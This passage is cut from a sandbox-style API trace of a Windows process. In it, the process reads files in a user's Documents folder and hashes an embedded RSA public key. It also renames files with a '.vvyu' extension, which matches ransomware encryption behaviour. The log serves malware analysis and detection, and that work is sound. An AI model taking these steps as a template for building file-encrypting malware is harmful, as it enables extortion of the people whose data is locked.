hHeap=0x2c0000) returned 1 [0192.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0192.663] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.664] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.664] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.664] CloseHandle (hObject=0x584) returned 1 [0192.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0192.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.666] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\S_CAeTbN.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\s_caetbn.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\S_CAeTbN.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\s_caetbn.ots.vvyu")) returned 1 [0192.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.667] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0192.670] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6972e460, ftCreationTime.dwHighDateTime=0x1d89a2e, ftLastAccessTime.dwLowDateTime=0x5186bf10, ftLastAccessTime.dwHighDateTime=0x1d8a533, ftLastWriteTime.dwLowDateTime=0x5186bf10, ftLastWriteTime.dwHighDateTime=0x1d8a533, nFileSizeHigh=0x0, nFileSizeLow=0x14463, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ua71cE_srBW.docx", cAlternateFileName="UA71CE~1.DOC")) returned 1 [0192.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0192.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.671] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\Ua71cE_srBW.docx") returned=".docx" [0192.671] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\Ua71cE_srBW.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ua71ce_srbw.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.672] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=83043) returned 1 [0192.672] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.676] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1443d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.676] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.678] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.678] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x14463, lpOverlapped=0x0) returned 1 [0192.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.680] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.680] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.681] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.681] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.681] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.681] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.681] GetLastError () returned 0x0 [0192.681] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0192.681] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.682] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.682] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0192.682] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14460) returned 0x2af5168 [0192.683] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3c00 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3c48 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0192.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0192.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.684] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0192.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0192.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0192.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6230 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6218 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0192.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0192.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.686] GetCurrentThreadId () returned 0x5d8 [0192.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7608 [0192.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0192.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.687] GetCurrentThreadId () returned 0x5d8 [0192.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0192.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0192.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6230 [0192.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6290 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62a8 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6248 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6218 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0192.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0192.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0192.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 